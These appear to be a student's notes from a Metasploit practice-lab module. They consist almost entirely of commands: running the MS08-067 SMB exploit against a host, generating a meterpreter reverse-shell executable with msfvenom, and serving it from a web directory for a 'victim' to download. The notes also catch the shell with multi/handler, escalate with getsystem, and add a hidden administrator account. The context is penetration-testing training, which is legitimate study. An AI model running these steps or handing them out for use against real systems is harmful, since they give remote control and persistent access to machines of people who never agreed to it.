Using the Metasploit Framework

In this module, you will complete the following exercises:

Exercise 1 - Using the Metasploit Framework Exercise 2 - Setting Module Options Exercise 3 - Using Payloads Exercise 4 - Creating Standalone Payloads with Msfvenom

Task 2 - Starting Metasploit

msfconsole

Task 3 - Finding Metasploit Modules

search platform:windows
search ms15-001
clear
search cve:2018 type:exploit

Task 4 - Using the Module Database from rapid7:

https://www.rapid7.com/db

in the first text box, type the following text: ms15-001 (optional: Type Module)

Task 1 - Set the Module Options

search ms15-001
info exploit/windows/local/ntapphelpcachecontrol
use windows/local/ntapphelpcachecontrol
show options
back
use windows/smb/ms08_067_netapi
show options
show targets
clear
set RHOST 192.168.0.5
exploit

clear
show payloads
clear
set PAYLOAD windows/shell/reverse_tcp

quit
msfvenom -l payloads
clear
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.3 -f exe -o payload.exe

Task 2 - Sharing the Payload with the Victim

cp payload.exe /var/www/html
http://192.168.0.3/payload.exe

Task 3 - Use the Multi/handler Module and Exploit the System

msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set LHOST 192.168.0.3
exploit
getuid
getsystem
shell
net users
net user /add plab Test**1234
net localgroup administrators plab /add
net users

Links:

• http://zero.webappsecurity.com/
• https://www.amanhardikar.com/mindmaps/Practice.html PENETRATION TESTING PRACTICE LAB - VULNERABLE APPS / SYSTEMS
• https://www.exploit-db.com/google-hacking-database Google Hacks
• https://www.ssllabs.com/ssltest/analyze.html?d=skills.practice-labs.com&hideResults=on
• https://www.ssllabs.com/ssltest/analyze.html?d=skills.practice-labs.com&s=199.60.103.28&hideResults=on
• https://www.comptia.org/blog/listing/author/james%20stanger